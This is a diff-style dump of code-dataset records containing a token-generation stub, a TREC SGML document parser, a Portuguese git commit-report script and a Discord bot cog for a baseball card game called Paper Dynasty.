''.join(random.choice(letters) for i in range(32))\n","sub_path":"src/pm_server/modules/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"355093434","text":"import os.path\nimport datetime\nimport re\nimport gzip\n\ndocNoKey = \"DOCNO\"\ndateTimeKey = \"DATE_TIME\"\ndocTypeKey = \"DOCTYPE\"\nheaderKey = \"HEADER\"\nslugKey = \"SLUG\"\ntrailerKey = \"TRAILER\"\nheadlineKey = \"HEADLINE\"\npKey = \"P\"\nbodyKey = \"BODY\"\ntextKey = \"TEXT\"\ndocKey = \"DOC\"\n\n\nclass Document:\n\tdef __init__(self):\n\t\t\"\"\"\n\t\t\tInitialize the document\n\t\t\"\"\"\n\t\tself.docNo = \"\"\n\t\tself.dateTime = \"\"\n\t\tself.header = \"\"\n\t\tself.docType = \"\"\n\t\tself.slug = \"\"\n\t\tself.headline = \"\"\n\t\tself.trailer = \"\"\n\t\tself.body = \"\"\n\t\tself.comparableDateTime = None\n\t\tself.paragraphs = []\n\n\tdef __str__(self):\n\t\t\"\"\"\n\t\t\tsimple tostring method, used for the developer to see what the object looks like (need to cleanse single quotes)\n\t\t\"\"\"\n\n\t\tparagraphText = \"\"\n\t\tfor paragraph in self.paragraphs:\n\t\t\tparagraphText += paragraph\n\n\t\treturn \"\"\"\n\t\t{\n\t\t\tdocNo: '%s',\n\t\t\tdateTime: '%s',\n\t\t\theader: '%s',\n\t\t\tslug: '%s',\n\t\t\theadline: '%s',\n\t\t\ttrailer: '%s',\n\t\t\tbody: '%s',\n\t\t\tparagraphs: '%s'\n\t\t}\n\t\t\"\"\" % (self.docNo, self.dateTime, self.header, self.slug, self.headline, self.trailer, self.body, paragraphText)\n\n\tdef getComparableDate(self):\n\t\tbeginningOfTime = datetime.datetime(1970, 1, 1)\n\n\t\ttry:\n\t\t\tbeginningOfTime = datetime.datetime.strptime(re.sub(\"\\\\s+\", \"\", self.dateTime)[0:10], \"%Y-%m-%d\")\n\t\texcept:\n\t\t\tpass\n\n\t\treturn beginningOfTime\n\n\t@staticmethod\n\tdef cleanseParagraph(paragraph):\n\t\tbeginningArticles = [\"--\", \"_\"]\n\t\taltParagraph = paragraph\n\n\t\tfor beginningArticle in beginningArticles:\n\t\t\tresult = altParagraph.find(beginningArticle, 0)\n\n\t\t\tif result > -1:\n\t\t\t\tsubStr = altParagraph[0:result]\n\t\t\t\tuppers = [l for l in subStr if l.isupper()]\n\n\t\t\t\tif float(len(uppers)) > float(len(subStr) / 2):\n\t\t\t\t\taltParagraph = altParagraph[result+len(beginningArticle):]\n\t\t\t\t\tbreak\n\n\t\treturn altParagraph\n\n\t@staticmethod\n\tdef build(objectDictionary):\n\t\t\"\"\"\n\t\t\tbuild the document object given a dictionary with string keys and array of strings values: { 'key', [ 'first', 'second' ]}\n\t\t\"\"\"\n\n\t\tnewDocument = Document()\n\n\t\tif docNoKey in objectDictionary:\n\t\t\tfor item in objectDictionary[docNoKey]:\n\t\t\t\tnewDocument.docNo += unicode(item, errors='replace')\n\n\t\tif docTypeKey in objectDictionary:\n\t\t\tfor item in objectDictionary[docTypeKey]:\n\t\t\t\tnewDocument.docType += unicode(item, errors='replace')\n\n\t\tif dateTimeKey in objectDictionary:\n\t\t\tfor item in objectDictionary[dateTimeKey]:\n\t\t\t\tnewDocument.dateTime += unicode(item, errors='replace')\n\n\t\tif headerKey in objectDictionary:\n\t\t\tfor item in objectDictionary[headerKey]:\n\t\t\t\tnewDocument.header += unicode(item, errors='replace')\n\n\t\tif slugKey in objectDictionary:\n\t\t\tfor item in objectDictionary[slugKey]:\n\t\t\t\tnewDocument.slug += unicode(item, errors='replace')\n\n\t\tif headlineKey in objectDictionary:\n\t\t\tfor item in objectDictionary[headlineKey]:\n\t\t\t\tnewDocument.headline += unicode(item, errors='replace')\n\n\t\tif trailerKey in objectDictionary:\n\t\t\tfor item in objectDictionary[trailerKey]:\n\t\t\t\tnewDocument.trailer += unicode(item, errors='replace')\n\n\t\tif pKey in objectDictionary:\n\t\t\tfor item in objectDictionary[pKey]:\n\t\t\t\tnewDocument.paragraphs.append(unicode(item, errors='replace'))\n\t\telif textKey 
in objectDictionary:\n\t\t\tfor item in objectDictionary[textKey]:\n\t\t\t\tnewDocument.paragraphs.append(Document.cleanseParagraph(unicode(item, errors='replace')))\n\n\t\tif bodyKey in objectDictionary:\n\t\t\tfor item in objectDictionary[bodyKey]:\n\t\t\t\tnewDocument.body += unicode(item, errors='replace')\n\n\t\treturn newDocument\n\n\t@staticmethod\n\tdef returnCharsFromDocument(filePath, seekToId=None):\n\t\t\"\"\"\n\t\t\treturn the characters from a document, optionally seeking to a document id first\n\t\t\"\"\"\n\t\tif filePath[-3:] == \".gz\":\n\t\t\tdocFile = gzip.open(filePath)\n\t\telse:\n\t\t\tdocFile = open(filePath, 'r')\n\n\t\tif seekToId is not None:\n\t\t\tpos = 0\n\t\t\tprevpos = 0\n\t\t\tline = \"\"\n\t\t\twhile seekToId not in line:\n\t\t\t\tprevpos = pos\n\t\t\t\tpos = docFile.tell()\n\t\t\t\tline = docFile.readline()\n\n\t\t\tif seekToId in line:\n\t\t\t\tif docNoKey in line:\n\t\t\t\t\toffset = prevpos - docFile.tell()\n\t\t\t\telse:\n\t\t\t\t\toffset = pos - docFile.tell()\n\t\t\t\tdocFile.seek(offset, 1)\n\t\t\telse:\n\t\t\t\traise IOError(\"Could not find topic \" + seekToId + \" in file \" + filePath)\n\n\t\twhile True:\n\t\t\tc = docFile.read(1)\n\n\t\t\tif not c:\n\t\t\t\treturn\n\n\t\t\tyield c\n\n\t@staticmethod\n\tdef returnCharsFromString(largeString):\n\t\t\"\"\"\n\t\t\treturn the characters from a string\n\t\t\"\"\"\n\t\tfor char in largeString:\n\t\t\tyield char\n\n\t@staticmethod\n\tdef factoryFromIndexer(documentIndexer):\n\t\tif documentIndexer is None:\n\t\t\treturn None\n\n\t\tindex = 0\n\t\tactualString = \"\"\n\t\tfor char in Document.returnCharsFromDocument(documentIndexer.fileName):\n\t\t\tif index >= documentIndexer.start and index <= documentIndexer.end:\n\t\t\t\tactualString += char\n\t\t\telif index > documentIndexer.end:\n\t\t\t\treturn Document.factory(actualString)\n\n\t\t\tindex += 1\n\n\t@staticmethod\n\tdef factoryForSpecificDocNo(inputFileName, docNo):\n\t\t\"\"\"\n\t\t\tbuild 1 document given an input and doc number\n\t\t\"\"\"\n\n\t\tcharMethod = Document.returnCharsFromDocument\n\n\t\ttagStack = []\n\t\tcurrentTag = \"\"\n\t\tcurrentObject = {}\n\n\t\tseenOpeningTag = False\n\t\tseenClosingTag = False\n\t\tseenClosingXml = False\n\t\tworkspace = \"\"\n\n\t\tfoundDocNo = False\n\n\t\tfor c in charMethod(inputFileName, docNo):\n\t\t\t# print c,\n\t\t\tif c == \"<\":\n\t\t\t\tseenOpeningTag = True\n\t\t\t\ttagStackLen = len(tagStack)\n\n\t\t\t\tif tagStackLen > 0:\n\t\t\t\t\tlastTag = tagStack[tagStackLen - 1]\n\t\t\t\t\t# check if we found the docno\n\t\t\t\t\tif lastTag == docNoKey and workspace.strip() == docNo:\n\t\t\t\t\t\tfoundDocNo = True\n\n\t\t\t\t\tif lastTag in currentObject and foundDocNo:\n\t\t\t\t\t\tcurrentObject[lastTag].append(workspace)\n\t\t\t\t\telif foundDocNo:\n\t\t\t\t\t\tcurrentObject[lastTag] = [workspace]\n\n\t\t\t\tcurrentTag = \"\"\n\t\t\t\tworkspace = \"\"\n\t\t\telif c == \"/\" and seenOpeningTag:\n\t\t\t\tseenClosingXml = True\n\t\t\telif c == \">\" and seenOpeningTag:\n\t\t\t\t# remove the last one\n\t\t\t\tif seenClosingXml and len(tagStack) > 0:\n\t\t\t\t\ttagStack.pop()\n\t\t\t\telse:\n\t\t\t\t\tif currentTag[:4] == \"DOC \" and docNo in currentTag:\n\t\t\t\t\t\tfoundDocNo = True\n\t\t\t\t\t\ttagStack.append(\"DOC\")\n\t\t\t\t\t\tcurrentObject[docNoKey] = [docNo]\n\t\t\t\t\telse:\n\t\t\t\t\t\ttagStack.append(currentTag)\n\n\t\t\t\tseenOpeningTag = False\n\t\t\t\tseenClosingXml = False\n\t\t\t\tseenClosingTag = False\n\t\t\t\tworkspace = \"\"\n\n\t\t\t\tendedXmlDoc = len(tagStack) == 0\n\t\t\t\tif endedXmlDoc and foundDocNo:\n\t\t\t\t\treturn 
Document.build(currentObject)\n\t\t\t\telif endedXmlDoc:\n\t\t\t\t\tcurrentObject = {}\n\t\t\telif seenOpeningTag:\n\t\t\t\tcurrentTag += c\n\t\t\telse:\n\t\t\t\tworkspace += c\n\t\treturn None\n\n\t@staticmethod\n\tdef factory(input, isFile=False):\n\t\t\"\"\"\n\t\t\tbuild a single document given an input\n\t\t\"\"\"\n\t\tresult = list(Document.factoryMultiple(input, isFile))\n\n\t\tif len(result) > 0:\n\t\t\treturn result[0]\n\t\treturn None\n\n\t@staticmethod\n\tdef factoryMultiple(input, isFile=False, isSingle=True):\n\t\t\"\"\"\n\t\t\tbuild multiple documents given an input\n\t\t\"\"\"\n\n\t\tcharMethod = Document.returnCharsFromString\n\n\t\tif isFile:\n\t\t\tcharMethod = Document.returnCharsFromDocument\n\n\t\ttagStack = []\n\t\tcurrentTag = \"\"\n\t\tcurrentObject = {}\n\n\t\tseenOpeningTag = False\n\t\tseenClosingTag = False\n\t\tseenClosingXml = False\n\t\tworkspace = \"\"\n\n\t\tfor c in charMethod(input):\n\t\t\tif c == \"<\":\n\t\t\t\tseenOpeningTag = True\n\n\t\t\t\ttagStackLen = len(tagStack)\n\n\t\t\t\tif tagStackLen > 0:\n\t\t\t\t\tlastTag = tagStack[tagStackLen - 1]\n\t\t\t\t\tif lastTag in currentObject:\n\t\t\t\t\t\tcurrentObject[lastTag].append(workspace)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcurrentObject[lastTag] = [workspace]\n\n\t\t\t\tcurrentTag = \"\"\n\t\t\t\tworkspace = \"\"\n\t\t\telif c == \"/\" and seenOpeningTag:\n\t\t\t\tseenClosingXml = True\n\t\t\telif c == \">\" and seenOpeningTag:\n\t\t\t\t# remove the last one\n\t\t\t\tif seenClosingXml and len(tagStack) > 0:\n\t\t\t\t\ttagStack.pop()\n\t\t\t\telse:\n\t\t\t\t\ttagStack.append(currentTag)\n\n\t\t\t\tseenOpeningTag = False\n\t\t\t\tseenClosingXml = False\n\t\t\t\tseenClosingTag = False\n\t\t\t\tworkspace = \"\"\n\n\t\t\t\tif len(tagStack) == 0:\n\t\t\t\t\tyield Document.build(currentObject)\n\n\t\t\t\t\t# don't want to compute more than we have to...\n\t\t\t\t\tif isSingle:\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\tcurrentObject = {}\n\n\t\t\telif seenOpeningTag:\n\t\t\t\tcurrentTag += c\n\t\t\telse:\n\t\t\t\tworkspace += c","sub_path":"src/extract/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
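+# A parsing sketch for the Document class above (Python 2, since it relies on
+# unicode()); the TREC-style SGML snippet below is made up for illustration.
+raw = "<DOC><DOCNO> FT911-1 </DOCNO><HEADLINE> Example </HEADLINE><TEXT> Body text. </TEXT></DOC>"
+doc = Document.factory(raw)
+print(doc.docNo)       # ' FT911-1 '
+print(doc.paragraphs)  # cleansed contents of the TEXT tag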
+{"seq_id":"513336627","text":"import git\nimport os\nimport datetime\nimport argparse\nfrom re import search\n\ndef validateDate(date_text):\n if (date_text != None):\n try:\n datetime.datetime.strptime(str(date_text), '%Y-%m-%d')\n except Exception as e:\n raise Exception(\"Formato de data inválido, deve ser YYYY-MM-DD\")\n\ndef validateChave(chave):\n if (chave != None):\n chave = str(chave)\n if (chave.startswith(\"C\") != True or len(chave) != 8):\n raise Exception(\"Formato de chave inválido!\")\n\ndef validateTextoBusca(texto):\n if (texto != None):\n texto = str(texto)\n if(len(texto) > 0):\n print(\"\")\n print(\"Texto de Busca a aplicar: \" + texto)\n print(\"\")\n else:\n raise Exception(\"Texto de Busca nao foi fornecido!\")\n\n\ndef montarFiltroLog(args):\n filtro = []\n filtro.append(\"git\")\n filtro.append(\"rev-list\")\n filtro.append(\"--remotes\")\n\n if (args.start_date):\n filtro.append('--after=' + str(args.start_date) + 'T00:00:01')\n if (args.end_date):\n filtro.append('--until=' + args.end_date + 'T23:59:59')\n if (args.key):\n filtro.append('--author=' + args.key)\n\n # if (len(filtro) > 0):\n # filtro.append(\"--pretty=format:%H\")\n\n if (args.texto_busca):\n filtro.append('--grep=' + args.texto_busca)\n\n print(\"\")\n print(\"Comando executado:\")\n print(filtro)\n print(\"\")\n\n return filtro\n\ndef isArgumentoInformado(args):\n return (args.start_date or args.end_date or args.key or args.hash or args.texto_busca)\n\n# Definição dos argumentos de filtro\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--start-date\", \"-sd\", help=\"Data inicial do commit padrão (YYYY-mm-dd)\")\nparser.add_argument(\"--end-date\", \"-ed\", help=\"Data final do commit (YYYY-mm-dd)\")\nparser.add_argument(\"--key\", \"-k\", help=\"Chave C do usuário que realizou o commit\")\nparser.add_argument(\"--hash\", \"-ha\", help=\"Hash do commit a ser analisado\")\nparser.add_argument(\"--texto-busca\", \"-tb\", help=\"Texto a buscar nas mensagens de log dos commits. Exemplo: task 123456.\")\n\n# Leitura dos argumentos\ninputArgs = parser.parse_args()\n\ndirpath = os.getcwd()\nfoldername = os.path.basename(dirpath) + \"/\"\narquivosNovos = []\narquivosModificados = []\n\ng = git.Git(dirpath.replace(\"\\\\\",\"/\"))\n\nif (not isArgumentoInformado(inputArgs)):\n print(\"É necessário informar pelo menos um dos argumentos usados no filtro dos commits. 
Execute o programa com a opção --help ou -h\")\nelse:\n\n if (inputArgs.hash):\n print(\"Coletando dados dos arquivos criados...\")\n\n loginfoAdicionados = g.execute([\"git\", \"show\", str(inputArgs.hash), \"--name-status\", \"--pretty=oneline\", \"--abbrev-commit\", \"--diff-filter=A\"])\n linhasAdicionados = loginfoAdicionados.splitlines()\n\n if len(linhasAdicionados) > 0:\n arquivosNovos = arquivosNovos + list(\n map(lambda x: foldername + x.replace('A\\t', '') + '#' + str(inputArgs.hash)[0:10], linhasAdicionados))\n\n print(\"Coletando dados dos arquivos modificados...\")\n\n loginfoModificados = g.execute([\"git\", \"show\", str(inputArgs.hash), \"--name-status\", \"--pretty=oneline\", \"--abbrev-commit\", \"--diff-filter=M\"])\n linhasModificados = loginfoModificados.splitlines()\n\n if len(linhasModificados) > 0:\n arquivosModificados = arquivosModificados + list(\n map(lambda x: foldername + x.replace('MM\\t', '').replace('M\\t', '') + '#' + str(inputArgs.hash)[0:10],\n linhasModificados))\n\n arquivosNovosSet = set(arquivosNovos)\n arquivosModificadosSet = set(arquivosModificados)\n\n for novo in arquivosNovos:\n arquivo = novo[:novo.index(\"#\")]\n\n if (arquivo != foldername and arquivo.find(\".\")):\n iguais = set(filter(lambda nome: search(arquivo, nome), arquivosModificados))\n try:\n arquivosModificadosSet = arquivosModificadosSet.difference(iguais)\n except ValueError:\n pass\n\n arquivosNovos = list(arquivosNovosSet)\n arquivosModificados = list(arquivosModificadosSet)\n\n arquivosNovos.sort(key=lambda f: os.path.splitext(f)[1])\n arquivosModificados.sort(key=lambda f: os.path.splitext(f)[1])\n\n print('_______________Arquivos Novos_______________')\n extensaoAnterior = ''\n for x in arquivosNovos:\n extensao = os.path.splitext(x)[1].split('#')[0]\n if extensao != extensaoAnterior:\n extensaoAnterior = extensao;\n print('##Arquivos com extensão ' + extensaoAnterior)\n if (extensao != \"\"):\n print(x.strip(\" \"))\n\n print('_______________Arquivos Modificados_______________')\n extensaoAnterior = ''\n for x in arquivosModificados:\n extensao = os.path.splitext(x)[1].split('#')[0]\n if extensao != extensaoAnterior:\n extensaoAnterior = extensao;\n print('##Arquivos com extensão ' + extensaoAnterior)\n if (extensao != \"\"):\n print(x)\n\n else:\n validateDate(inputArgs.start_date)\n validateDate(inputArgs.end_date)\n validateChave(inputArgs.key)\n validateTextoBusca(inputArgs.texto_busca)\n filtroLog = montarFiltroLog(inputArgs)\n\n try:\n logCommits = g.execute(filtroLog)\n print(\"=\"*40)\n print(\"COMMITS ENCONTRADOS\")\n print(\"=\"*40)\n print(logCommits)\n commitsList = logCommits.splitlines()\n print(\"=\"*40)\n print(\"Total de COMMITS: {}\".format(len(commitsList)))\n print(\"=\"*40)\n\n print(\"Coletando dados dos arquivos criados...\")\n for commit in commitsList:\n loginfoAdicionados = g.execute([\"git\", \"show\", commit,\"--name-status\",\"--pretty=oneline\",\"--abbrev-commit\",\"--diff-filter=A\"])\n linhasAdicionados = loginfoAdicionados.split('\\n')\n\n if len(linhasAdicionados) > 0:\n arquivosNovos = arquivosNovos + list(map(lambda x: foldername + x.replace('A\\t','') + '#' + commit[0:10], linhasAdicionados))\n\n print(\"Coletando dados dos arquivos modificados...\")\n for commit in commitsList:\n loginfoModificados = g.execute([\"git\", \"show\", commit,\"--name-status\",\"--pretty=oneline\",\"--abbrev-commit\",\"--diff-filter=M\"])\n linhasModificados = loginfoModificados.split('\\n')\n\n if len(linhasModificados) > 0:\n arquivosModificados = 
arquivosModificados + list(map(lambda x: foldername + x.replace('MM\\t','').replace('M\\t','') + '#' + commit[0:10], linhasModificados))\n\n        arquivosNovosSet = set(arquivosNovos)\n        arquivosModificadosSet = set(arquivosModificados)\n\n        for novo in arquivosNovos:\n            arquivo = novo[:novo.index(\"#\")]\n\n            if (arquivo != foldername and arquivo.find(\".\")):\n                iguais = set(filter(lambda nome: search(arquivo, nome), arquivosModificados))\n                try:\n                    arquivosModificadosSet = arquivosModificadosSet.difference(iguais)\n                except ValueError:\n                    pass\n\n        arquivosNovos = list(arquivosNovosSet)\n        arquivosModificados = list(arquivosModificadosSet)\n\n        arquivosNovos.sort(key=lambda f: os.path.splitext(f)[1])\n        arquivosModificados.sort(key=lambda f: os.path.splitext(f)[1])\n\n        print(\"=\"*40)\n        print('_____________Arquivos Novos_____________')\n        print(\"=\"*40)\n        extensaoAnterior = ''\n        for x in arquivosNovos:\n            extensao = os.path.splitext(x)[1].split('#')[0]\n            if extensao != extensaoAnterior:\n                extensaoAnterior = extensao;\n                print('##Arquivos com extensão ' + extensaoAnterior)\n            if (extensao != \"\"):\n                print(x.strip(\" \"))\n\n        print(\"=\"*40)\n        print('__________Arquivos Modificados__________')\n        print(\"=\"*40)\n        extensaoAnterior = ''\n        for x in arquivosModificados:\n            extensao = os.path.splitext(x)[1].split('#')[0]\n            if extensao != extensaoAnterior:\n                extensaoAnterior = extensao;\n                print('##Arquivos com extensão ' + extensaoAnterior)\n            if (extensao != \"\"):\n                print(x)\n\n    except Exception as e:\n        print(\"Ocorreu uma exceção durante a execução do programa, provavelmente o filtro informado não retornou dados \" + str(e))","sub_path":"gerador-relatorio-atividades.py","file_name":"gerador-relatorio-atividades.py","file_ext":"py","file_size_in_byte":8726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
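+# Example invocations for the report script above (placeholder dates, key and
+# hash), run from the root of a git working copy:
+#
+#   python gerador-relatorio-atividades.py --start-date 2020-01-01 --end-date 2020-01-31
+#   python gerador-relatorio-atividades.py --key C1234567
+#   python gerador-relatorio-atividades.py --hash 0a1b2c3d4e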
+{"seq_id":"390061827","text":"import discord\r\nimport pygsheets\r\nfrom db_engine import *\r\nfrom discord.ext import commands\r\nfrom difflib import get_close_matches\r\n\r\n\r\nclass Players(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.helpers = self.bot.get_cog('Helpers')\r\n\r\n @commands.command(name='show', aliases=['card', 'player'], help='show ')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def display_player(self, ctx, cardset, *, name):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n yp_query = Player.select(Player.name).where(Player.cardset == cardset)\r\n yearly_players = []\r\n for x in yp_query:\r\n yearly_players.append(x.name.lower())\r\n\r\n try:\r\n great_match = get_close_matches(name.lower(), yearly_players, cutoff=0.75)[0]\r\n this_guy = Player.get((fn.Lower(Player.name) == great_match.lower()), Player.cardset == cardset)\r\n\r\n embed = await self.helpers.get_player_embed(this_guy)\r\n\r\n await self.helpers.send_to_bothole(ctx, None, embed)\r\n\r\n except Exception as e:\r\n await ctx.send(f'I could not find {name.title()}. Is that the right year?')\r\n print(f'**ERROR** (display_player): {e}')\r\n\r\n @commands.command(name='roster', aliases=['team'], help='Show your active roster')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def get_inventory(self, ctx, *abbrev):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n if abbrev:\r\n team = Team.get_or_none(Team.abbrev == abbrev[0].upper())\r\n if not team:\r\n await ctx.send(f'I couldn\\'t find **{abbrev}**. Is that the team\\'s abbreviation?')\r\n return\r\n else:\r\n team = Team.get_by_owner(ctx.author.id)\r\n if not team:\r\n await ctx.send(f'What team are you searching for?')\r\n return\r\n\r\n embed = self.helpers.get_active_roster(team, f'{self.bot.get_user(team.gmid).avatar_url}')\r\n\r\n await self.helpers.send_to_bothole(ctx, content=f'{ctx.author.mention}', embed=embed)\r\n\r\n @commands.command(name='in', help='Get Paper Dynasty Players role')\r\n async def give_role(self, ctx, *args):\r\n await ctx.author.add_roles(discord.utils.get(ctx.guild.roles, name='Paper Dynasty Players'))\r\n await ctx.send('I got u, boo. ;)')\r\n\r\n @commands.command(name='out', help='Remove Paper Dynasty Players role')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def take_role(self, ctx, *args):\r\n await ctx.author.remove_roles(discord.utils.get(ctx.guild.roles, name='Paper Dynasty Players'))\r\n await ctx.send('Oh no! I\\'m so sad to see you go! 
What are we going to do without you?')\r\n\r\n @commands.command(name='teams', help='List all teams')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def list_teams(self, ctx, *args):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n all_teams = Team.select()\r\n\r\n # Collect rarity objects\r\n try:\r\n rar_mvp = Rarity.get(Rarity.name == 'MVP')\r\n rar_als = Rarity.get(Rarity.name == 'All-Star')\r\n rar_sta = Rarity.get(Rarity.name == 'Starter')\r\n rar_res = Rarity.get(Rarity.name == 'Reserve')\r\n rar_rpl = Rarity.get(Rarity.name == 'Replacement')\r\n except Exception as e:\r\n print(f'**Error**: (players inv getrars) - {e}')\r\n return\r\n\r\n embed = discord.Embed(title='All Teams', color=0xdeeadd)\r\n\r\n # Build embed\r\n for x in all_teams:\r\n mvps, alss, stas, ress, reps = 0, 0, 0, 0, 0\r\n roster = Roster.get_cards(team=x)\r\n\r\n for p in roster:\r\n if p.player.rarity == rar_mvp:\r\n mvps += 1\r\n elif p.player.rarity == rar_als:\r\n alss += 1\r\n elif p.player.rarity == rar_sta:\r\n stas += 1\r\n elif p.player.rarity == rar_res:\r\n ress += 1\r\n else:\r\n reps += 1\r\n\r\n un_packs = Pack.select(Pack.id).where((Pack.team == x) & (Pack.card1.is_null())).count()\r\n op_packs = Pack.select(Pack.id).where((Pack.team == x) & (Pack.card1.is_null(False))).count()\r\n\r\n embed.add_field(\r\n name=f'{x.lname}',\r\n value=f'GM: {x.gmname}\\n'\r\n f'Packs (Unopen): {op_packs + un_packs} ({un_packs})\\n\\n'\r\n f'MVPs: {mvps}\\n'\r\n f'All-Stars: {alss}\\n'\r\n f'Starters: {stas}\\n'\r\n f'Reserves: {ress}\\n'\r\n f'Replacements: {reps}\\n------\\n'\r\n f'Collection Value: {self.helpers.get_team_value(x)}')\r\n\r\n await self.helpers.send_to_bothole(ctx, content=f'{ctx.author.mention}', embed=embed)\r\n\r\n @commands.command(name='result', help='Log your game results')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def result(self, ctx, awayabbrev: str, awayscore: int, homeabbrev: str, homescore: int):\r\n # Validate teams listed\r\n try:\r\n awayteam = Team.get(Team.abbrev == awayabbrev.upper())\r\n hometeam = Team.get(Team.abbrev == homeabbrev.upper())\r\n print(f'Final: {awayabbrev} {awayscore} - {homescore} {homeabbrev}')\r\n except Exception as e:\r\n error = f'**ERROR:** {type(e).__name__} - {e}'\r\n print(error)\r\n await ctx.message.add_reaction('❌')\r\n await ctx.send(f'Hey, {ctx.author.mention}, I couldn\\'t find the teams you mentioned. 
You put '\r\n f'**{awayabbrev}** as the away team and **{homeabbrev}** as the home team.')\r\n return\r\n\r\n earnings = {'away': 0, 'home': 0}\r\n earnings_away = []\r\n earnings_home = []\r\n\r\n # Check author then log result\r\n if ctx.author.id in [awayteam.gmid, awayteam.gmid2, hometeam.gmid, hometeam.gmid2] \\\r\n or ctx.author.id == self.bot.owner_id:\r\n this_result = Result(week=Current.get_by_id(1).week,\r\n awayteam=awayteam, hometeam=hometeam,\r\n awayscore=awayscore, homescore=homescore,\r\n season=Current.get_by_id(1).season)\r\n this_result.save()\r\n await self.helpers.pause_then_type(ctx, f'Just logged {awayteam.abbrev.upper()} {awayscore} - '\r\n f'{homescore} {hometeam.abbrev.upper()}')\r\n await ctx.message.add_reaction('✅')\r\n\r\n # Credit pack for win\r\n if awayscore > homescore:\r\n earnings['away'] += 1\r\n earnings_away.append('- 1 pack for the win\\n')\r\n else:\r\n earnings['home'] += 1\r\n earnings_home.append('- 1 pack for the win\\n')\r\n\r\n away_team_value = self.helpers.get_team_value(awayteam)\r\n home_team_value = self.helpers.get_team_value(hometeam)\r\n delta = away_team_value - home_team_value\r\n if delta < 0:\r\n increments = divmod(-delta, self.helpers.TEAM_DELTA_CONSTANT)\r\n print(f'increments: {increments}')\r\n packs = min(increments[0], 5)\r\n if packs > 0:\r\n earnings['away'] += packs\r\n earnings_away.append(f'- {packs} pack{\"s\" if packs > 1 else \"\"} for underdog\\n')\r\n else:\r\n increments = divmod(delta, self.helpers.TEAM_DELTA_CONSTANT)\r\n print(f'increments: {increments}')\r\n packs = min(increments[0], 5)\r\n if packs > 0:\r\n earnings['home'] += packs\r\n earnings_home.append(f'- {packs} pack{\"s\" if packs > 1 else \"\"} for underdog\\n')\r\n\r\n print(f'earn away: {earnings[\"away\"]} / earn home: {earnings[\"home\"]}')\r\n away_packs_remaining = Current.get_by_id(1).packlimit - awayteam.weeklypacks\r\n home_packs_remaining = Current.get_by_id(1).packlimit - hometeam.weeklypacks\r\n away_final_earnings = away_packs_remaining if away_packs_remaining >= earnings[\"away\"] else earnings[\"away\"]\r\n home_final_earnings = home_packs_remaining if home_packs_remaining >= earnings[\"home\"] else earnings[\"home\"]\r\n print(f'away_final_earnings: {away_final_earnings}')\r\n print(f'home_final_earnings: {home_final_earnings}')\r\n\r\n # TODO: Seems to be giving underdog the square of their earnings\r\n economy = self.bot.get_cog('Economy')\r\n if earnings[\"away\"] > 0:\r\n print(f'away_final_earnings: {away_final_earnings}')\r\n economy.give_pack(awayteam, away_final_earnings)\r\n if earnings[\"home\"] > 0:\r\n print(f'home_final_earnings: {home_final_earnings}')\r\n economy.give_pack(hometeam, home_final_earnings)\r\n\r\n embed = discord.Embed(title=f'{awayteam.sname} {awayscore} - {homescore} {hometeam.sname}',\r\n description='Score Report / Post Game Earnings')\r\n embed.add_field(name=awayteam.lname,\r\n value=f'Team Value: {away_team_value}\\n\\n'\r\n f'**Earn: {earnings[\"away\"]} pack{\"s\" if earnings[\"away\"] != 1 else \"\"}**'\r\n f' (limit {away_final_earnings})\\n'\r\n f'{\"Summary:\" if len(earnings_away) > 0 else \"\"}\\n'\r\n f'{earnings_away[0] if len(earnings_away) > 0 else \"\"}'\r\n f'{earnings_away[1] if len(earnings_away) > 1 else \"\"}',\r\n inline=False)\r\n embed.add_field(name=hometeam.lname,\r\n value=f'Team Value: {home_team_value}\\n\\n'\r\n f'**Earn: {earnings[\"home\"]} pack{\"s\" if earnings[\"home\"] != 1 else \"\"}**'\r\n f' (limit {home_final_earnings})\\n'\r\n f'{\"Summary:\" if 
len(earnings_home) > 0 else \"\"}\\n'\r\n f'{earnings_home[0] if len(earnings_home) > 0 else \"\"}'\r\n f'{earnings_home[1] if len(earnings_home) > 1 else \"\"}',\r\n inline=False)\r\n await self.helpers.send_to_news(ctx, None, embed)\r\n\r\n @commands.command(name='sheet', aliases=['google'], help='Link to your roster sheet')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def get_roster_command(self, ctx):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n team = Team.get_by_owner(ctx.author.id)\r\n if not team:\r\n await ctx.send(f'Do you have a team? I don\\'t see your name here...')\r\n return\r\n\r\n await ctx.send(f'{ctx.author.mention}\\n{team.lname} Roster Sheet: <{self.helpers.get_roster_sheet(team)}>')\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Players(bot))\r\n","sub_path":"cogs/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":11527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
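+# The player lookup above relies on difflib.get_close_matches with cutoff=0.75;
+# a standalone sketch of that fuzzy matching (the names are made up):
+from difflib import get_close_matches
+
+players = ["mike trout", "aaron judge", "mookie betts"]
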